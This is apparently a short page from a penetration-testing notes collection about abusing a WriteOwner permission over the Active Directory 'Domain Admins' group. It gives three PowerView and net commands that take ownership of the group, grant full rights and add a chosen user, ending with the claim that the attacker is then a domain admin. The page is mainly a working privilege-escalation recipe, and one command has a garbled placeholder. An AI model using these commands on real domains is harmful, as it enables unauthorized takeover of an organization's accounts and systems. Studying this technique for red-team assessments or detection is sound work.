WriteOwner Over Domain Admins

What this basically means is that we can pottentially add that user to the Domain Admins Groupjs because it has write permissions on the properties of the group.

Depending whether we have credentials or a session as the user we might have to provide the variables for the password and the creds.

After importing PowerView.

Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity <user that has privs>
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -Rights All -PrincipalIdentity <user that has the priv>
net group "Domain Admins" Muser that has the priv> /add /domain

Afterwards we should be part of the domain admins.

PreviousGet-ChangesAll NextAllowed to Delegate To:

Last updated 2 years ago